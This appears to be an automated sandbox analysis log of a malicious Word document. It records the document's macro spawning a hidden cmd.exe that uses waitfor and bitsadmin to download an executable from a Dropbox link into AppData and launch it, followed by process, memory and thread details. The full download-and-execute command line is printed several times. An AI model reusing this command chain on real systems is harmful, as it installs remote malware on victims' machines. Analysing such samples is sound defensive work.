Registry Create Key reg_name = HKEY_CURRENT_USER\Software\Microsoft\VBA\7.1\Common True 1
Fn
Registry Read Value reg_name = HKEY_CURRENT_USER\Software\Microsoft\VBA\7.1\Common, value_name = RequireDeclaration, data = 139, type = REG_NONE False 1
Fn
Registry Read Value reg_name = HKEY_CURRENT_USER\Software\Microsoft\VBA\7.1\Common, value_name = CompileOnDemand, data = 0, type = REG_NONE False 1
Fn
Registry Read Value reg_name = HKEY_CURRENT_USER\Software\Microsoft\VBA\7.1\Common, value_name = NotifyUserBeforeStateLoss, data = 1, type = REG_NONE False 1
Fn
Registry Read Value reg_name = HKEY_CURRENT_USER\Software\Microsoft\VBA\7.1\Common, value_name = BackGroundCompile, data = 0, type = REG_NONE False 1
Fn
Registry Read Value reg_name = HKEY_CURRENT_USER\Software\Microsoft\VBA\7.1\Common, value_name = BreakOnAllErrors, data = 255, type = REG_NONE False 1
Fn
Registry Read Value reg_name = HKEY_CURRENT_USER\Software\Microsoft\VBA\7.1\Common, value_name = BreakOnServerErrors, data = 0, type = REG_NONE False 1
Fn
Module Get Address module_name = Unknown module name, function = MsoMultiByteToWideChar, address_out = 0x7fee356f200 True 1
Fn
Registry Open Key reg_name = HKEY_CLASSES_ROOT\TypeLib True 1
Fn
Registry Open Key reg_name = HKEY_CLASSES_ROOT\TypeLib\{00020905-0000-0000-C000-000000000046} True 1
Fn
Registry Enumerate Keys reg_name = HKEY_CLASSES_ROOT\TypeLib\{00020905-0000-0000-C000-000000000046} True 1
Fn
Registry Open Key reg_name = HKEY_CLASSES_ROOT\TypeLib\{00020905-0000-0000-C000-000000000046}\8.7 True 1
Fn
Registry Open Key reg_name = HKEY_CLASSES_ROOT\TypeLib\{00020905-0000-0000-C000-000000000046}\8.7\409 False 1
Fn
Registry Open Key reg_name = win64 True 1
Fn
Registry Open Key reg_name = HKEY_CLASSES_ROOT\TypeLib\{00020905-0000-0000-C000-000000000046}\8.7\0 True 1
Fn
Registry Read Value reg_name = HKEY_CLASSES_ROOT\TypeLib\{00020905-0000-0000-C000-000000000046}\8.7\0\win64, data = C:\Program Files\Microsoft Office\Root\Office16\MSWORD.OLB True 1
Fn
Module Get Filename process_name = c:\program files\microsoft office\root\office16\winword.exe, file_name_orig = C:\Program Files\Common Files\Microsoft Shared\VBA\VBA7.1\VBE7.DLL, size = 260 True 1
Fn
Registry Open Key reg_name = HKEY_CLASSES_ROOT\TypeLib True 1
Fn
Registry Open Key reg_name = HKEY_CLASSES_ROOT\TypeLib\{00020430-0000-0000-C000-000000000046} True 1
Fn
Registry Enumerate Keys reg_name = HKEY_CLASSES_ROOT\TypeLib\{00020430-0000-0000-C000-000000000046} True 1
Fn
Registry Enumerate Keys reg_name = HKEY_CLASSES_ROOT\TypeLib\{00020430-0000-0000-C000-000000000046} True 1
Fn
Registry Open Key reg_name = HKEY_CLASSES_ROOT\TypeLib\{00020430-0000-0000-C000-000000000046}\2.0 True 1
Fn
Registry Open Key reg_name = HKEY_CLASSES_ROOT\TypeLib\{00020430-0000-0000-C000-000000000046}\2.0\0 True 1
Fn
Registry Open Key reg_name = HKEY_CLASSES_ROOT\TypeLib\{00020430-0000-0000-C000-000000000046}\2.0\0\win64 True 1
Fn
Registry Open Key reg_name = HKEY_CLASSES_ROOT\TypeLib\{00020430-0000-0000-C000-000000000046}\2.0\0 True 1
Fn
Registry Read Value reg_name = HKEY_CLASSES_ROOT\TypeLib\{00020430-0000-0000-C000-000000000046}\2.0\0\win64, data = C:\Windows\system32\stdole2.tlb True 1
Fn
Registry Open Key reg_name = HKEY_CLASSES_ROOT\TypeLib True 1
Fn
Registry Open Key reg_name = HKEY_CLASSES_ROOT\TypeLib\{2DF8D04C-5BFA-101B-BDE5-00AA0044DE52} True 1
Fn
Registry Enumerate Keys reg_name = HKEY_CLASSES_ROOT\TypeLib\{2DF8D04C-5BFA-101B-BDE5-00AA0044DE52} True 1
Fn
Registry Enumerate Keys reg_name = HKEY_CLASSES_ROOT\TypeLib\{2DF8D04C-5BFA-101B-BDE5-00AA0044DE52} True 1
Fn
Registry Enumerate Keys reg_name = HKEY_CLASSES_ROOT\TypeLib\{2DF8D04C-5BFA-101B-BDE5-00AA0044DE52} True 1
Fn
Registry Open Key reg_name = HKEY_CLASSES_ROOT\TypeLib\{2DF8D04C-5BFA-101B-BDE5-00AA0044DE52}\2.8 True 1
Fn
Registry Open Key reg_name = HKEY_CLASSES_ROOT\TypeLib\{2DF8D04C-5BFA-101B-BDE5-00AA0044DE52}\2.8\0 True 1
Fn
Registry Open Key reg_name = HKEY_CLASSES_ROOT\TypeLib\{2DF8D04C-5BFA-101B-BDE5-00AA0044DE52}\2.8\0\win64 True 1
Fn
Registry Open Key reg_name = HKEY_CLASSES_ROOT\TypeLib\{2DF8D04C-5BFA-101B-BDE5-00AA0044DE52}\2.8\0 True 1
Fn
Registry Read Value reg_name = HKEY_CLASSES_ROOT\TypeLib\{2DF8D04C-5BFA-101B-BDE5-00AA0044DE52}\2.8\0\win64, data = C:\Program Files\Common Files\Microsoft Shared\OFFICE16\MSO.DLL True 1
Fn
System Get Time type = Local Time, time = 2018-01-10 10:49:07 (Local Time) True 2
Fn
System Get Cursor x_out = 777, y_out = 852 True 1
Fn
System Get Time type = Local Time, time = 2018-01-10 10:49:07 (Local Time) True 2
Fn
Registry Open Key reg_name = HKEY_CLASSES_ROOT\TypeLib True 1
Fn
Registry Open Key reg_name = HKEY_CLASSES_ROOT\TypeLib\{00020905-0000-0000-C000-000000000046} True 1
Fn
Registry Enumerate Keys reg_name = HKEY_CLASSES_ROOT\TypeLib\{00020905-0000-0000-C000-000000000046} True 1
Fn
Registry Open Key reg_name = HKEY_CLASSES_ROOT\TypeLib\{00020905-0000-0000-C000-000000000046}\8.7 True 1
Fn
Registry Open Key reg_name = HKEY_CLASSES_ROOT\TypeLib\{00020905-0000-0000-C000-000000000046}\8.7\409 False 1
Fn
Registry Open Key reg_name = HKEY_CLASSES_ROOT\TypeLib\{2DF8D04C-5BFA-101B-BDE5-00AA0044DE52}\2.8\0\win64\win64 True 1
Fn
Registry Open Key reg_name = HKEY_CLASSES_ROOT\TypeLib\{00020905-0000-0000-C000-000000000046}\8.7\0 True 1
Fn
Registry Read Value reg_name = HKEY_CLASSES_ROOT\TypeLib\{00020905-0000-0000-C000-000000000046}\8.7\0\win64, data = C:\Program Files\Microsoft Office\Root\Office16\MSWORD.OLB True 1
Fn
System Get Time type = Local Time, time = 2018-01-10 10:49:07 (Local Time) True 1
Fn
System Get Cursor x_out = 777, y_out = 852 True 1
Fn
System Get Time type = Local Time, time = 2018-01-10 10:49:07 (Local Time) True 7
Fn
Module Get Address module_name = Unknown module name, function = 600, address_out = 0x7fef0d9c6fc True 1
Fn
Module Get Address module_name = Unknown module name, function = 595, address_out = 0x7fef0f94a40 True 1
Fn
Module Get Address module_name = Unknown module name, function = 632, address_out = 0x7fef0ddfe60 True 1
Fn
Module Get Address module_name = Unknown module name, function = 516, address_out = 0x7fef0de17b0 True 1
Fn
Module Get Address module_name = Unknown module name, function = 608, address_out = 0x7fef0de142c True 1
Fn
Process Create process_name = cmd.exe /c "waitfor /t 5 YKERQ & bitsadmin /transfer UKEF /download /priority normal https://www.dropbox.com/s/7b9332r6vmiuhxl/1qesyozananrivoxityof.exe?dl=1 %appdata%\iuoldw.exe &start %appdata%\iuoldw.exe", os_pid = 0xa50, startup_flags = STARTF_USESHOWWINDOW, show_window = SW_HIDE True 1
Fn
Window Create - True 1
Fn
System Get Cursor x_out = 897, y_out = 514 True 1
Fn
Registry Open Key reg_name = HKEY_CLASSES_ROOT\TypeLib True 1
Fn
Registry Open Key reg_name = HKEY_CLASSES_ROOT\TypeLib\{00020430-0000-0000-C000-000000000046} True 1
Fn
Registry Enumerate Keys reg_name = HKEY_CLASSES_ROOT\TypeLib\{00020430-0000-0000-C000-000000000046} True 1
Fn
Registry Enumerate Keys reg_name = HKEY_CLASSES_ROOT\TypeLib\{00020430-0000-0000-C000-000000000046} True 1
Fn
Registry Open Key reg_name = HKEY_CLASSES_ROOT\TypeLib\{00020430-0000-0000-C000-000000000046}\2.0 True 1
Fn
Registry Open Key reg_name = HKEY_CLASSES_ROOT\TypeLib\{00020430-0000-0000-C000-000000000046}\2.0\0 True 1
Fn
Registry Open Key reg_name = HKEY_CLASSES_ROOT\TypeLib\{00020430-0000-0000-C000-000000000046}\2.0\0\win64 True 1
Fn
Registry Open Key reg_name = HKEY_CLASSES_ROOT\TypeLib\{00020430-0000-0000-C000-000000000046}\2.0\0 True 1
Fn
Registry Read Value reg_name = HKEY_CLASSES_ROOT\TypeLib\{00020430-0000-0000-C000-000000000046}\2.0\0\win64, data = C:\Windows\system32\stdole2.tlb True 1
Fn
Registry Open Key reg_name = HKEY_CLASSES_ROOT\TypeLib True 1
Fn
Registry Open Key reg_name = HKEY_CLASSES_ROOT\TypeLib\{2DF8D04C-5BFA-101B-BDE5-00AA0044DE52} True 1
Fn
Registry Enumerate Keys reg_name = HKEY_CLASSES_ROOT\TypeLib\{2DF8D04C-5BFA-101B-BDE5-00AA0044DE52} True 1
Fn
Registry Enumerate Keys reg_name = HKEY_CLASSES_ROOT\TypeLib\{2DF8D04C-5BFA-101B-BDE5-00AA0044DE52} True 1
Fn
Registry Enumerate Keys reg_name = HKEY_CLASSES_ROOT\TypeLib\{2DF8D04C-5BFA-101B-BDE5-00AA0044DE52} True 1
Fn
Registry Open Key reg_name = HKEY_CLASSES_ROOT\TypeLib\{2DF8D04C-5BFA-101B-BDE5-00AA0044DE52}\2.8 True 1
Fn
Registry Open Key reg_name = HKEY_CLASSES_ROOT\TypeLib\{2DF8D04C-5BFA-101B-BDE5-00AA0044DE52}\2.8\0 True 1
Fn
Registry Open Key reg_name = HKEY_CLASSES_ROOT\TypeLib\{2DF8D04C-5BFA-101B-BDE5-00AA0044DE52}\2.8\0\win64 True 1
Fn
Registry Open Key reg_name = HKEY_CLASSES_ROOT\TypeLib\{2DF8D04C-5BFA-101B-BDE5-00AA0044DE52}\2.8\0 True 1
Fn
Registry Read Value reg_name = HKEY_CLASSES_ROOT\TypeLib\{2DF8D04C-5BFA-101B-BDE5-00AA0044DE52}\2.8\0\win64, data = C:\Program Files\Common Files\Microsoft Shared\OFFICE16\MSO.DLL True 1
Fn
System Get Time type = Ticks, time = 295902 True 9
Fn
Module Get Address module_name = Unknown module name, function = 600, address_out = 0x7fef0d9c6fc True 1
Fn
Module Get Address module_name = Unknown module name, function = 595, address_out = 0x7fef0f94a40 True 1
Fn
Module Get Address module_name = Unknown module name, function = 632, address_out = 0x7fef0ddfe60 True 1
Fn
Module Get Address module_name = Unknown module name, function = 516, address_out = 0x7fef0de17b0 True 1
Fn
Module Get Address module_name = Unknown module name, function = 608, address_out = 0x7fef0de142c True 1
Fn
Module Get Address module_name = Unknown module name, function = 600, address_out = 0x7fef0d9c6fc True 1
Fn
Module Get Address module_name = Unknown module name, function = 595, address_out = 0x7fef0f94a40 True 1
Fn
Module Get Address module_name = Unknown module name, function = 632, address_out = 0x7fef0ddfe60 True 1
Fn
Module Get Address module_name = Unknown module name, function = 516, address_out = 0x7fef0de17b0 True 1
Fn
Module Get Address module_name = Unknown module name, function = 608, address_out = 0x7fef0de142c True 1
Fn
Process #2: cmd.exe
(Host: 74, Network: 0)
+
Information Value
ID #2
File Name c:\windows\system32\cmd.exe
Command Line cmd.exe /c "waitfor /t 5 YKERQ & bitsadmin /transfer UKEF /download /priority normal https://www.dropbox.com/s/7b9332r6vmiuhxl/1qesyozananrivoxityof.exe?dl=1 %appdata%\iuoldw.exe &start %appdata%\iuoldw.exe"
Initial Working Directory C:\Users\aETAdzjz\Desktop\
Monitor Start Time: 00:00:17, Reason: Child Process
Unmonitor End Time: 00:10:13, Reason: Terminated by Timeout
Monitor Duration 00:09:56
OS Process Information
+
Information Value
PID 0xa50
Parent PID 0x954 (c:\program files\microsoft office\root\office16\winword.exe)
Is Created or Modified Executable False
Integrity Level Medium
Username YKYD69Q\aETAdzjz
Groups
  • YKYD69Q\Domain Users (MANDATORY, ENABLED_BY_DEFAULT, ENABLED)
  • Everyone (MANDATORY, ENABLED_BY_DEFAULT, ENABLED)
  • BUILTIN\Administrators (USE_FOR_DENY_ONLY)
  • BUILTIN\Users (MANDATORY, ENABLED_BY_DEFAULT, ENABLED)
  • NT AUTHORITY\INTERACTIVE (MANDATORY, ENABLED_BY_DEFAULT, ENABLED)
  • CONSOLE LOGON (MANDATORY, ENABLED_BY_DEFAULT, ENABLED)
  • NT AUTHORITY\Authenticated Users (MANDATORY, ENABLED_BY_DEFAULT, ENABLED)
  • NT AUTHORITY\This Organization (MANDATORY, ENABLED_BY_DEFAULT, ENABLED)
  • NT AUTHORITY\Logon Session 00000000:00010636 (MANDATORY, ENABLED_BY_DEFAULT, ENABLED, LOGON_ID)
  • LOCAL (MANDATORY, ENABLED_BY_DEFAULT, ENABLED)
  • NT AUTHORITY\NTLM Authentication (MANDATORY, ENABLED_BY_DEFAULT, ENABLED)
Enabled Privileges SeChangeNotifyPrivilege
Thread IDs
0x A54
Region
+
Name Start VA End VA Type Permissions Monitored Dump YARA Match Actions
private_0x0000000000010000 0x00010000 0x0002ffff Private Memory Readable, Writable True True False
pagefile_0x0000000000010000 0x00010000 0x0001ffff Pagefile Backed Memory Readable, Writable True False False
pagefile_0x0000000000020000 0x00020000 0x0002ffff Pagefile Backed Memory Readable, Writable True False False
pagefile_0x0000000000030000 0x00030000 0x00033fff Pagefile Backed Memory Readable True False False
pagefile_0x0000000000040000 0x00040000 0x00040fff Pagefile Backed Memory Readable True False False
locale.nls 0x00050000 0x000b6fff Memory Mapped File Readable False False False
pagefile_0x00000000000c0000 0x000c0000 0x000c6fff Pagefile Backed Memory Readable True False False
private_0x00000000000d0000 0x000d0000 0x000dffff Private Memory Readable, Writable True True False
pagefile_0x00000000000e0000 0x000e0000 0x000e1fff Pagefile Backed Memory Readable, Writable True False False
private_0x00000000000f0000 0x000f0000 0x000f0fff Private Memory Readable, Writable True True False
private_0x0000000000100000 0x00100000 0x00100fff Private Memory Readable, Writable True True False
private_0x0000000000110000 0x00110000 0x0020ffff Private Memory Readable, Writable True True False
private_0x0000000000210000 0x00210000 0x0030ffff Private Memory Readable, Writable True True False
private_0x0000000000400000 0x00400000 0x004fffff Private Memory Readable, Writable True True False
pagefile_0x0000000000500000 0x00500000 0x00687fff Pagefile Backed Memory Readable True False False
pagefile_0x0000000000690000 0x00690000 0x00810fff Pagefile Backed Memory Readable True False False
pagefile_0x0000000000820000 0x00820000 0x01c1ffff Pagefile Backed Memory Readable True False False
pagefile_0x0000000001c20000 0x01c20000 0x01f62fff Pagefile Backed Memory Readable True False False
sortdefault.nls 0x01f70000 0x0223efff Memory Mapped File Readable False False False
cmd.exe 0x4ab20000 0x4ab78fff Memory Mapped File Readable, Writable, Executable True False False
user32.dll 0x76e70000 0x76f69fff Memory Mapped File Readable, Writable, Executable False False False
kernel32.dll 0x76f70000 0x7708efff Memory Mapped File Readable, Writable, Executable False False False
ntdll.dll 0x77090000 0x77238fff Memory Mapped File Readable, Writable, Executable False False False
private_0x000000007efe0000 0x7efe0000 0x7ffdffff Private Memory Readable True False False
pagefile_0x000000007efe0000 0x7efe0000 0x7f0dffff Pagefile Backed Memory Readable True False False
private_0x000000007f0e0000 0x7f0e0000 0x7ffdffff Private Memory Readable True False False
private_0x000000007ffe0000 0x7ffe0000 0x7ffeffff Private Memory Readable True True False
winbrand.dll 0x7fef5290000 0x7fef5297fff Memory Mapped File Readable, Writable, Executable False False False
kernelbase.dll 0x7fefd320000 0x7fefd38afff Memory Mapped File Readable, Writable, Executable False False False
lpk.dll 0x7fefd490000 0x7fefd49dfff Memory Mapped File Readable, Writable, Executable False False False
usp10.dll 0x7fefd4a0000 0x7fefd568fff Memory Mapped File Readable, Writable, Executable False False False
imm32.dll 0x7fefe300000 0x7fefe32dfff Memory Mapped File Readable, Writable, Executable False False False
gdi32.dll 0x7fefe330000 0x7fefe396fff Memory Mapped File Readable, Writable, Executable False False False
msctf.dll 0x7fefebf0000 0x7fefecf8fff Memory Mapped File Readable, Writable, Executable False False False
msvcrt.dll 0x7fefef80000 0x7feff01efff Memory Mapped File Readable, Writable, Executable False False False
apisetschema.dll 0x7feff3b0000 0x7feff3b0fff Memory Mapped File Readable, Writable, Executable False False False
pagefile_0x000007fffffb0000 0x7fffffb0000 0x7fffffd2fff Pagefile Backed Memory Readable True False False
private_0x000007fffffdd000 0x7fffffdd000 0x7fffffdefff Private Memory Readable, Writable True True False
private_0x000007fffffdf000 0x7fffffdf000 0x7fffffdffff Private Memory Readable, Writable True True False
Threads
Thread 0xa54
(Host: 67, Network: 0)
+
Category Operation Information Success Count Logfile
System Get Time type = System Time, time = 2018-01-10 10:49:07 (UTC) True 1
Fn
System Get Time type = Ticks, time = 83741 True 1
Fn
Module Get Handle module_name = c:\windows\system32\cmd.exe, base_address = 0x4ab20000 True 1
Fn
Module Get Handle module_name = c:\windows\system32\kernel32.dll, base_address = 0x76f70000 True 1
Fn
Module Get Address module_name = c:\windows\system32\kernel32.dll, function = SetThreadUILanguage, address_out = 0x76f86d40 True 1
Fn
Registry Open Key reg_name = HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\System False 1
Fn
File Open filename = STD_OUTPUT_HANDLE True 3
Fn
File Open filename = STD_INPUT_HANDLE True 2
Fn
Environment Get Environment String - True 2
Fn
Data
Registry Open Key reg_name = HKEY_LOCAL_MACHINE\Software\Microsoft\Command Processor True 1
Fn
Registry Read Value reg_name = HKEY_LOCAL_MACHINE\Software\Microsoft\Command Processor, value_name = DisableUNCCheck, data = 24, type = REG_NONE False 1
Fn
Registry Read Value reg_name = HKEY_LOCAL_MACHINE\Software\Microsoft\Command Processor, value_name = EnableExtensions, data = 1, type = REG_DWORD_LITTLE_ENDIAN True 1
Fn
Registry Read Value reg_name = HKEY_LOCAL_MACHINE\Software\Microsoft\Command Processor, value_name = DelayedExpansion, data = 1, type = REG_NONE False 1
Fn
Registry Read Value reg_name = HKEY_LOCAL_MACHINE\Software\Microsoft\Command Processor, value_name = DefaultColor, data = 0, type = REG_DWORD_LITTLE_ENDIAN True 1
Fn
Registry Read Value reg_name = HKEY_LOCAL_MACHINE\Software\Microsoft\Command Processor, value_name = CompletionChar, data = 64, type = REG_DWORD_LITTLE_ENDIAN True 1
Fn
Registry Read Value reg_name = HKEY_LOCAL_MACHINE\Software\Microsoft\Command Processor, value_name = PathCompletionChar, data = 64, type = REG_DWORD_LITTLE_ENDIAN True 1
Fn
Registry Read Value reg_name = HKEY_LOCAL_MACHINE\Software\Microsoft\Command Processor, value_name = AutoRun, data = 64, type = REG_NONE False 1
Fn
Registry Open Key reg_name = HKEY_CURRENT_USER\Software\Microsoft\Command Processor True 1
Fn
Registry Read Value reg_name = HKEY_CURRENT_USER\Software\Microsoft\Command Processor, value_name = DisableUNCCheck, data = 64, type = REG_NONE False 1
Fn
Registry Read Value reg_name = HKEY_CURRENT_USER\Software\Microsoft\Command Processor, value_name = EnableExtensions, data = 1, type = REG_DWORD_LITTLE_ENDIAN True 1
Fn
Registry Read Value reg_name = HKEY_CURRENT_USER\Software\Microsoft\Command Processor, value_name = DelayedExpansion, data = 1, type = REG_NONE False 1
Fn
Registry Read Value reg_name = HKEY_CURRENT_USER\Software\Microsoft\Command Processor, value_name = DefaultColor, data = 0, type = REG_DWORD_LITTLE_ENDIAN True 1
Fn
Registry Read Value reg_name = HKEY_CURRENT_USER\Software\Microsoft\Command Processor, value_name = CompletionChar, data = 9, type = REG_DWORD_LITTLE_ENDIAN True 1
Fn
Registry Read Value reg_name = HKEY_CURRENT_USER\Software\Microsoft\Command Processor, value_name = PathCompletionChar, data = 9, type = REG_DWORD_LITTLE_ENDIAN True 1
Fn
Registry Read Value reg_name = HKEY_CURRENT_USER\Software\Microsoft\Command Processor, value_name = AutoRun, data = 9, type = REG_NONE False 1
Fn
Module Get Filename process_name = c:\windows\system32\cmd.exe, file_name_orig = C:\Windows\system32\cmd.exe, size = 260 True 1
Fn
Environment Get Environment String name = PATH, result_out = C:\Windows\system32;C:\Windows;C:\Windows\System32\Wbem;C:\Windows\System32\WindowsPowerShell\v1.0\;C:\Program Files\Microsoft Office\root\Client True 1
Fn
Environment Get Environment String name = PATHEXT, result_out = .COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH;.MSC True 1
Fn
Environment Get Environment String name = PROMPT False 1
Fn
Environment Set Environment String name = PROMPT, value = $P$G True 1
Fn
Environment Get Environment String - True 1
Fn
Data
Environment Get Environment String name = COMSPEC, result_out = C:\Windows\system32\cmd.exe True 1
Fn
Environment Get Environment String name = KEYS False 1
Fn
File Get Info filename = C:\Users\aETAdzjz\Desktop, type = file_attributes True 2
Fn
Environment Set Environment String name = =C:, value = C:\Users\aETAdzjz\Desktop True 1
Fn
Environment Get Environment String - True 1
Fn
Data
Module Get Handle module_name = c:\windows\system32\kernel32.dll, base_address = 0x76f70000 True 1
Fn
Module Get Address module_name = c:\windows\system32\kernel32.dll, function = CopyFileExW, address_out = 0x76f823d0 True 1
Fn
Module Get Address module_name = c:\windows\system32\kernel32.dll, function = IsDebuggerPresent, address_out = 0x76f78290 True 1
Fn
Module Get Address module_name = c:\windows\system32\kernel32.dll, function = SetConsoleInputExeNameW, address_out = 0x76f817e0 True 1
Fn
Environment Get Environment String name = appdata, result_out = C:\Users\aETAdzjz\AppData\Roaming True 2
Fn
Environment Get Environment String name = PATH, result_out = C:\Windows\system32;C:\Windows;C:\Windows\System32\Wbem;C:\Windows\System32\WindowsPowerShell\v1.0\;C:\Program Files\Microsoft Office\root\Client True 1
Fn
Environment Get Environment String name = PATHEXT, result_out = .COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH;.MSC True 1
Fn
Process Create process_name = C:\Windows\system32\waitfor.exe, os_pid = 0xa6c, creation_flags = CREATE_EXTENDED_STARTUPINFO_PRESENT, show_window = SW_SHOWNORMAL True 1
Fn
Environment Set Environment String name = COPYCMD True 1
Fn
Environment Get Environment String - True 1
Fn
Data
Environment Set Environment String name = =ExitCode, value = 00000001 True 1
Fn
Environment Get Environment String - True 1
Fn
Data
Environment Set Environment String name = =ExitCodeAscii True 1
Fn
Environment Get Environment String - True 1
Fn
Data
Environment Get Environment String name = PATH, result_out = C:\Windows\system32;C:\Windows;C:\Windows\System32\Wbem;C:\Windows\System32\WindowsPowerShell\v1.0\;C:\Program Files\Microsoft Office\root\Client True 1
Fn
Environment Get Environment String name = PATHEXT, result_out = .COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH;.MSC True 1
Fn
Process Create process_name = C:\Windows\system32\bitsadmin.exe, os_pid = 0xa90, creation_flags = CREATE_EXTENDED_STARTUPINFO_PRESENT, show_window = SW_SHOWNORMAL True 1
Fn
Environment Set Environment String name = COPYCMD True 1
Fn
Environment Get Environment String - True 1
Fn
Data
Environment Set Environment String name = =ExitCode, value = 00000000 True 1
Fn
Environment Get Environment String - True 1
Fn
Data
Environment Set Environment String name = =ExitCodeAscii True 1
Fn
Environment Get Environment String - True 1
Fn
Data
File Open filename = STD_INPUT_HANDLE True 1
Fn
File Open filename = STD_OUTPUT_HANDLE True 1
Fn
File Open filename = STD_ERROR_HANDLE True 1
Fn
Environment Get Environment String name = PATHEXT, result_out = .COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH;.MSC True 1
Fn
Process Create process_name = C:\Users\aETAdzjz\AppData\Roaming\iuoldw.exe, os_pid = 0x65c, creation_flags = CREATE_NEW_CONSOLE, CREATE_UNICODE_ENVIRONMENT, CREATE_EXTENDED_STARTUPINFO_PRESENT, show_window = SW_SHOWNORMAL True 1
Fn
Thread Resume process_name = c:\windows\system32\cmd.exe, os_tid = 0xa54 True 1
Fn
File Open filename = STD_OUTPUT_HANDLE True 2
Fn
File Open filename = STD_INPUT_HANDLE True 1
Fn
Process #3: waitfor.exe
+
Information Value
ID #3
File Name c:\windows\system32\waitfor.exe
Command Line waitfor /t 5 YKERQ
Initial Working Directory C:\Users\aETAdzjz\Desktop\
Monitor Start Time: 00:00:17, Reason: Child Process
Unmonitor End Time: 00:10:13, Reason: Terminated by Timeout
Monitor Duration 00:09:56
Remarks No high level activity detected in monitored regions
OS Process Information
+
Information Value
PID 0xa6c
Parent PID 0xa50 (c:\windows\system32\cmd.exe)
Is Created or Modified Executable False
Integrity Level Medium
Username YKYD69Q\aETAdzjz
Groups
  • YKYD69Q\Domain Users (MANDATORY, ENABLED_BY_DEFAULT, ENABLED)
  • Everyone (MANDATORY, ENABLED_BY_DEFAULT, ENABLED)
  • BUILTIN\Administrators (USE_FOR_DENY_ONLY)
  • BUILTIN\Users (MANDATORY, ENABLED_BY_DEFAULT, ENABLED)
  • NT AUTHORITY\INTERACTIVE (MANDATORY, ENABLED_BY_DEFAULT, ENABLED)
  • CONSOLE LOGON (MANDATORY, ENABLED_BY_DEFAULT, ENABLED)
  • NT AUTHORITY\Authenticated Users (MANDATORY, ENABLED_BY_DEFAULT, ENABLED)
  • NT AUTHORITY\This Organization (MANDATORY, ENABLED_BY_DEFAULT, ENABLED)
  • NT AUTHORITY\Logon Session 00000000:00010636 (MANDATORY, ENABLED_BY_DEFAULT, ENABLED, LOGON_ID)
  • LOCAL (MANDATORY, ENABLED_BY_DEFAULT, ENABLED)
  • NT AUTHORITY\NTLM Authentication (MANDATORY, ENABLED_BY_DEFAULT, ENABLED)
Enabled Privileges SeChangeNotifyPrivilege
Thread IDs
0x A70
Region
+
Name Start VA End VA Type Permissions Monitored Dump YARA Match Actions
private_0x0000000000010000 0x00010000 0x0002ffff Private Memory Readable, Writable True True False
pagefile_0x0000000000010000 0x00010000 0x0001ffff Pagefile Backed Memory Readable, Writable True False False
pagefile_0x0000000000020000 0x00020000 0x0002ffff Pagefile Backed Memory Readable, Writable True False False
pagefile_0x0000000000030000 0x00030000 0x00033fff Pagefile Backed Memory Readable True False False
pagefile_0x0000000000040000 0x00040000 0x00040fff Pagefile Backed Memory Readable True False False
locale.nls 0x00050000 0x000b6fff Memory Mapped File Readable False False False
pagefile_0x00000000000c0000 0x000c0000 0x000c6fff Pagefile Backed Memory Readable True False False
pagefile_0x00000000000d0000 0x000d0000 0x000d1fff Pagefile Backed Memory Readable, Writable True False False
waitfor.exe.mui 0x000e0000 0x000e2fff Memory Mapped File Readable, Writable False False False
private_0x00000000000f0000 0x000f0000 0x0016ffff Private Memory Readable, Writable True True False
private_0x0000000000170000 0x00170000 0x00170fff Private Memory Readable, Writable True True False
private_0x0000000000180000 0x00180000 0x00180fff Private Memory Readable, Writable True True False
private_0x00000000001a0000 0x001a0000 0x001affff Private Memory Readable, Writable True True False
private_0x00000000002a0000 0x002a0000 0x0039ffff Private Memory Readable, Writable True True False
private_0x00000000003a0000 0x003a0000 0x0049ffff Private Memory Readable, Writable True True False
pagefile_0x00000000004a0000 0x004a0000 0x00627fff Pagefile Backed Memory Readable True False False
pagefile_0x0000000000630000 0x00630000 0x007b0fff Pagefile Backed Memory Readable True False False
pagefile_0x00000000007c0000 0x007c0000 0x01bbffff Pagefile Backed Memory Readable True False False
user32.dll 0x76e70000 0x76f69fff Memory Mapped File Readable, Writable, Executable False False False
kernel32.dll 0x76f70000 0x7708efff Memory Mapped File Readable, Writable, Executable False False False
ntdll.dll 0x77090000 0x77238fff Memory Mapped File Readable, Writable, Executable False False False
private_0x000000007efe0000 0x7efe0000 0x7ffdffff Private Memory Readable True False False
pagefile_0x000000007efe0000 0x7efe0000 0x7f0dffff Pagefile Backed Memory Readable True False False
private_0x000000007f0e0000 0x7f0e0000 0x7ffdffff Private Memory Readable True False False
private_0x000000007ffe0000 0x7ffe0000 0x7ffeffff Private Memory Readable True True False
waitfor.exe 0xff370000 0xff37efff Memory Mapped File Readable, Writable, Executable False False False
mpr.dll 0x7fef8b10000 0x7fef8b27fff Memory Mapped File Readable, Writable, Executable False False False
wkscli.dll 0x7fefb200000 0x7fefb214fff Memory Mapped File Readable, Writable, Executable False False False
netutils.dll 0x7fefb220000 0x7fefb22bfff Memory Mapped File Readable, Writable, Executable False False False
netapi32.dll 0x7fefb230000 0x7fefb245fff Memory Mapped File Readable, Writable, Executable False False False
version.dll 0x7fefc1a0000 0x7fefc1abfff Memory Mapped File Readable, Writable, Executable False False False
srvcli.dll 0x7fefcdd0000 0x7fefcdf2fff Memory Mapped File Readable, Writable, Executable False False False
secur32.dll 0x7fefce70000 0x7fefce7afff Memory Mapped File Readable, Writable, Executable False False False
sspicli.dll 0x7fefcea0000 0x7fefcec4fff Memory Mapped File Readable, Writable, Executable False False False
kernelbase.dll 0x7fefd320000 0x7fefd38afff Memory Mapped File Readable, Writable, Executable False False False
lpk.dll 0x7fefd490000 0x7fefd49dfff Memory Mapped File Readable, Writable, Executable False False False
usp10.dll 0x7fefd4a0000 0x7fefd568fff Memory Mapped File Readable, Writable, Executable False False False
imm32.dll 0x7fefe300000 0x7fefe32dfff Memory Mapped File Readable, Writable, Executable False False False
gdi32.dll 0x7fefe330000 0x7fefe396fff Memory Mapped File Readable, Writable, Executable False False False
nsi.dll 0x7fefe3a0000 0x7fefe3a7fff Memory Mapped File Readable, Writable, Executable False False False
msctf.dll 0x7fefebf0000 0x7fefecf8fff Memory Mapped File Readable, Writable, Executable False False False
shlwapi.dll 0x7fefed80000 0x7fefedf0fff Memory Mapped File Readable, Writable, Executable False False False
msvcrt.dll 0x7fefef80000 0x7feff01efff Memory Mapped File Readable, Writable, Executable False False False
